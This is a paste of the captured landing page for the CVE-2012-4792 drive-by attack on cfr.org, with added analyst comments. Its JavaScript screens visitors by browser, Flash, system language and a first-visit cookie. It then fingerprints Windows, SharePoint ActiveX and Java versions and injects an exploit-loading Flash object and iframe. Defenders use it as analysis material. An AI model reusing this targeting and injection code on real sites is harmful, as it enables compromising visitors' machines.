eromang

CVE-2012-4792 drive-by version of 7 December

Dec 30th, 2012
  1. # This version was found in Google cache as it appeared on 7 Dec 2012 14:12:28 GMT
  2. # https://www.google.com/search?hl=en&source=hp&q=site:cfr.org&btnG=Recherche+Google&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=#q=site:cfr.org+news_14242aa.html&hl=en&safe=off&tbo=d&tbas=0&source=lnt&sa=X&psj=1&ei=Xc3eUOnSPMfR4QT8toCoBg&ved=0CBgQpwUoAA&fp=1&bpcl=40096503&biw=1376&bih=739&bav=on.2,or.r_gc.r_pw.r_cp.r_qf.&cad=b&sei=kxzgUL-oE8rb4QSoxYHYDA
  3.  
  4. <html>
  5. <head>
  6. <script type="text/javascript">var NREUMQ=NREUMQ||[];NREUMQ.push(["mark","firstbyte",new Date().getTime()]);</script>
  7. <script src=deployJava.js></script>
  8. <script type="text/javascript">
  /**
   * Returns the unescape()d text of document.cookie from `offset` up to the
   * next ";" (or to the end of the cookie string when no ";" follows).
   *
   * @param {number} offset - index in document.cookie where the value starts.
   * @returns {string} the decoded cookie value.
   */
  9. function getCookieVal (offset)
  10. {
  11.     var endstr = document.cookie.indexOf (";", offset);
  12.     if (endstr == -1)
  13.     {
  14.         endstr = document.cookie.length;
  15.     }
  16.     return unescape(document.cookie.substring(offset, endstr));
  17. }
  /**
   * Looks up a cookie by name in document.cookie.
   *
   * Compares "name=" against the cookie string at position 0 and then at the
   * character after each space, returning the value through getCookieVal on
   * the first match.
   *
   * @param {string} name - cookie name to search for.
   * @returns {?string} the decoded value, or null when no cookie matches.
   */
  18. function GetCookie (name)
  19. {
  20.     var arg = name + "=";
  21.     var alen = arg.length;
  22.     var clen = document.cookie.length;
  23.     var i = 0;
  24.     while (i < clen)
  25.        {
  26.        var j = i + alen;
  27.        if (document.cookie.substring(i, j) == arg)
  28.           return getCookieVal (j);
         // indexOf returns -1 when no further space exists, so i becomes 0 and the loop ends.
  29.        i = document.cookie.indexOf(" ", i) + 1;
  30.        if (i == 0)
  31.           break;
  32.        }
  33.     return null;
  34.     }
  /**
   * Writes one cookie to document.cookie; the value is escape()d.
   *
   * Arguments after (name, value) are optional and read positionally through
   * the legacy SetCookie.arguments object: [2] expires (an object exposing
   * toGMTString, i.e. a Date), [3] path, [4] domain, [5] secure flag.
   * Attributes left null (or secure != true) are omitted from the cookie string.
   *
   * @param {string} name - cookie name.
   * @param {*} value - cookie value, stored escape()d.
   */
  35. function SetCookie (name, value)
  36. {
  37.     var argv = SetCookie.arguments;
  38.     var argc = SetCookie.arguments.length;
  39.     var expires = (2 < argc) ? argv[2] : null;
  40.     var path = (3 < argc) ? argv[3] : null;
  41.     var domain = (4 < argc) ? argv[4] : null;
  42.     var secure = (5 < argc) ? argv[5] : false;
  43.     document.cookie = name + "=" + escape (value) +
  44.       ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  45.       ((path == null) ? "" : ("; path=" + path)) +
  46.       ((domain == null) ? "" : ("; domain=" + domain)) +
  47.          ((secure == true) ? "; secure" : "");
  48. }
  /**
   * Increments a per-browser visit counter stored in the "visit" cookie and
   * returns the new count.
   *
   * The cookie is rewritten on every call with path "/" and an expiry seven
   * days ahead (24 * 60 * 60 * 1000 * 7 ms). A missing cookie counts as 0, so
   * the first call returns 1.
   *
   * Analyst note: the page-level code further down compares this result with 1,
   * so a client that already holds the "visit" cookie is sent to about:blank;
   * re-fetching the page with the same cookie jar will not reproduce the
   * injection branch.
   *
   * @returns {number} the visit count after incrementing.
   */
  49. function DisplayInfo()
  50. {
  51.     var expdate = new Date();
  52.     var visit;
  53.     expdate.setTime(expdate.getTime() +  (24 * 60 * 60 * 1000*7 ));
  54.     if(!(visit = GetCookie("visit")))
  55.     visit = 0;
  56.     visit++;
  57.     SetCookie("visit", visit, expdate, "/", null, false);
  58.     return visit;
  59. }
  // Visitor gate, run while the page loads. Each failed check assigns
  // location.href = "about:blank". The four conditions visible here are:
  //   1. the lower-cased User-Agent contains "msie 8.0";
  //   2. the ShockwaveFlash.ShockwaveFlash ActiveX control can be instantiated;
  //   3. navigator.systemLanguage is zh-cn, en-us or zh-tw;
  //   4. DisplayInfo() returns 1, i.e. no earlier "visit" cookie was present.
  // Analyst note: a crawler or sandbox that does not present all four is
  // redirected to a blank page, so an empty result is not evidence that the
  // page is clean.
  60. var ua = window.navigator.userAgent.toLowerCase();
  61.  
  62. if (ua.indexOf('msie 8.0') <0)
  63. {
  64.     location.href="about:blank";
  65. }
  66.  
       // f stays the number 0 when the ActiveX object cannot be created, so
       // typeof f distinguishes "object" (Flash present) from "number".
  67.     var f = 0;
  68.     try {
  69.         f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  70.     }
  71.     catch (e) {
  72.     }
  73.     var g=typeof f;
  74.  
  75.     if(g!="object")
  76.     {
  77.         location.href="about:blank";
  78.     }
       // navigator.systemLanguage is an Internet Explorer property; where it is
       // undefined the .toLowerCase() call throws and this script block stops here.
  79.     var h=navigator.systemLanguage.toLowerCase();
  80.    
  81.     if(h!="zh-cn" && h!="en-us" && h!= "zh-tw")
  82.     {
  83.  
  84.         location.href="about:blank";
  85.     }
  86.  
  // Once-per-browser gate: DisplayInfo() also sets/refreshes the "visit" cookie.
  87. var num=DisplayInfo();
  88. if(num >1)
  89. {
  90.     location.href="about:blank";
  91. }
  /**
   * Body onload handler: requests "xsainfo.jpg" and, on an HTTP 200 reply,
   * fingerprints the client further and appends a Flash <object> plus an
   * <iframe> to the document body.
   *
   * What the visible code establishes:
   *  - The response body of xsainfo.jpg is never read; only readyState 4 and
   *    status 200 are checked, so the request acts as a go/no-go signal.
   *  - Branching is on the User-Agent with spaces removed: "nt6.1" (the
   *    Windows NT 6.1 token) or "nt5.1" (the Windows NT 5.1 token).
   *  - Every branch that fires appends the same markup: the Flash Player
   *    control (clsid D27CDB6E-AE6D-11cf-96B8-444553540000) loading today.swf
   *    and an iframe loading news.html. The only per-branch difference is the
   *    text written into the #test element ("true", "false", "default", "cat").
   *    Whether today.swf or news.html read that marker cannot be determined
   *    from this page.
   *
   * Analyst note: the relative resource names requested by this page are
   * deployJava.js, xsainfo.jpg, today.swf and news.html; they are the network
   * indicators available from this listing.
   */
  92. function download()
  93. {  
  94.     var xmlhttp;
        // Native XMLHttpRequest first, then a list of MSXML ActiveX progIDs as fallback.
  95.       try
  96.       {
  97.         xmlhttp = new XMLHttpRequest();
  98.       }
  99.       catch (e)
  100.       {
  101.         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  102.         var success = false;
  103.         for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  104.         {
  105.           try
  106.           {
  107.              xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  108.              success = true;
  109.           } catch (e)
  110.           {}
  111.         }
  112.      }
        // readystatechange handler; does nothing until the request has completed with status 200.
  113.     function callback()
  114.     {
  115.         if(xmlhttp.readyState==4)
  116.         {
  117.             if(xmlhttp.status==200)
  118.             {
                    // ua is the lower-cased User-Agent captured at page level; spaces are
                    // stripped so "windows nt 6.1" is matched as "nt6.1".
  119.                 var temp=ua.replace(/ /g,"");
  120.                 if (temp.indexOf("nt6.1")>-1) {
  121.                
  122.                
                        // Probe two SharePoint.OpenDocuments ActiveX versions; ma/mb stay the
                        // number 0 when instantiation fails. Presumably an installed-Office
                        // fingerprint - confirm against the controls' documentation.
  123.                     var key = "";
  124.                     var ma = 0;
  125.                     try {
  126.                         ma = new ActiveXObject("SharePoint.OpenDocuments.4");
  127.                     }
  128.                     catch (e) {
  129.                     }
  130.                     var mb = 0;
  131.                     try {
  132.                         mb = new ActiveXObject("SharePoint.OpenDocuments.3");
  133.                     }
  134.                     catch (e) {
  135.                     }
  136.                    
                        // "girl": both versions present; "boy": only version 3 present;
                        // key stays "" for every other combination.
  137.                     if ((typeof ma) == "object" && (typeof mb) == "object") {
  138.                         key = "girl";  
  139.                     }
  140.                     else if ((typeof ma) == "number" && (typeof mb) == "object") {
  141.                         key = "boy";    
  142.                     }
  143.                    
  144.                    
  145.                     if (key == "girl") {    
  146.            
  147.                         document.getElementById('test').innerHTML="true";  
  148.                         document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  149.                        
  150.                     }
  151.                     if (key == "boy") {    
  152.                     document.getElementById('test').innerHTML="false";
  153.                         document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  154.                        
  155.                     }
  156.                    
                        // Neither SharePoint combination matched: continue only when
                        // deployJava.versionCheck reports a 1.6.0+ runtime and no 1.7.0+ runtime.
                        // deployJava comes from the deployJava.js script included in <head>.
  157.                     if (key == "") {
  158.                         if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  159.                        
  160.                            
  161.                             document.getElementById('test').innerHTML="default";
  162.                             document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  163.                            
  164.                         }
  165.                     }
  166.                 }
                    // "nt5.1" branch: no SharePoint or Java probing, the markup is appended directly.
  167.                 if(temp.indexOf("nt5.1")>-1)
  168.                 {
  169.                
  170.                     document.getElementById('test').innerHTML="cat";
  171.                     document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  172.                            
  173.                 }  
  174.                
  175.            
  176.             }
  177.         }
  178.     }
        // Asynchronous GET relative to the page URL; callback runs on each readyState change.
  179.     xmlhttp.open("get", "xsainfo.jpg", true);  
  180.     xmlhttp.onreadystatechange = callback;
  181.     xmlhttp.send(null);
  182. }
  183.  
  184. </script>
  185. </head>
  186. <body onload="download()">
  187. <div id=test>hello</div>
  188. <script type="text/javascript">if(!NREUMQ.f){NREUMQ.f=function(){NREUMQ.push(["load",new Date().getTime()]);var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://d1ros97qkrwjf5.cloudfront.net/42/eum/rum.js";document.body.appendChild(e);if(NREUMQ.a)NREUMQ.a();};NREUMQ.a=window.onload;window.onload=NREUMQ.f;};NREUMQ.push(["nrf2","beacon-1.newrelic.com","864c0a0685","1597576","MlEAN0FYDUoEUUYKXAsbNxFaFglKSlhBTF0AQxE8Ag1RDVdTU01bEVkO",0,0,new Date().getTime()]);</script>
  189. </body>
  190. </html>